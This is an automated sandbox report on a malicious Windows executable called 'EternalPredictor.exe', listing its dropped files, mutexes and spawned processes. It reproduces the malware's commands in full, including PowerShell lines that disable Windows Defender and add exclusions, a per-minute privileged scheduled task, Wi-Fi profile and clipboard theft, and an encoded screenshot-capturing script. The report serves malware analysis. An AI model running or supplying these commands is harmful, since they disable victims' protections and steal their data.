                        Source: eternal.exe.0.dr, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@170/58@5/4
                        Source: C:\Users\user\Desktop\EternalPredictor.exeFile created: C:\Users\user\AppData\Roaming\eternal.exeJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4128:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
                        Source: C:\Users\user\Desktop\EternalPredictor.exeMutant created: \Sessions\1\BaseNamedObjects\jONt95IbMc1ABmB7S
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3796:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:636:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3832:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\eternal.exeMutant created: \Sessions\1\BaseNamedObjects\Z7DjfJsbzoeA8FRF
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\program.exeMutant created: \Sessions\1\BaseNamedObjects\7
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeMutant created: \Sessions\1\BaseNamedObjects\Global\3575651c-bb47-448e-a514-22865732bbc
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                        Source: EternalPredictor.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: EternalPredictor.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Users\user\Desktop\EternalPredictor.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: SecurityHealthSystray.exe, 00000036.00000002.1707554882.00000000015E0000.00000004.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)C:\Windows\system32\;
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: EternalPredictor.exeVirustotal: Detection: 56%
                        Source: EternalPredictor.exeReversingLabs: Detection: 57%
                        Source: program.exeString found in binary or memory: set-addPolicy
                        Source: program.exeString found in binary or memory: id-cmc-addExtensions
                        Source: unknownProcess created: C:\Users\user\Desktop\EternalPredictor.exe "C:\Users\user\Desktop\EternalPredictor.exe"
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess created: C:\Users\user\AppData\Roaming\eternal.exe "C:\Users\user\AppData\Roaming\eternal.exe"
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess created: C:\Users\user\AppData\Roaming\skuld.exe "C:\Users\user\AppData\Roaming\skuld.exe"
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess created: C:\Users\user\AppData\Roaming\program.exe "C:\Users\user\AppData\Roaming\program.exe"
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\skuld.exe
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Users\user\AppData\Roaming\program.exe "C:\Users\user\AppData\Roaming\program.exe"
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
                        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\XClient.exe C:\Users\user\AppData\Roaming\XClient.exe
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
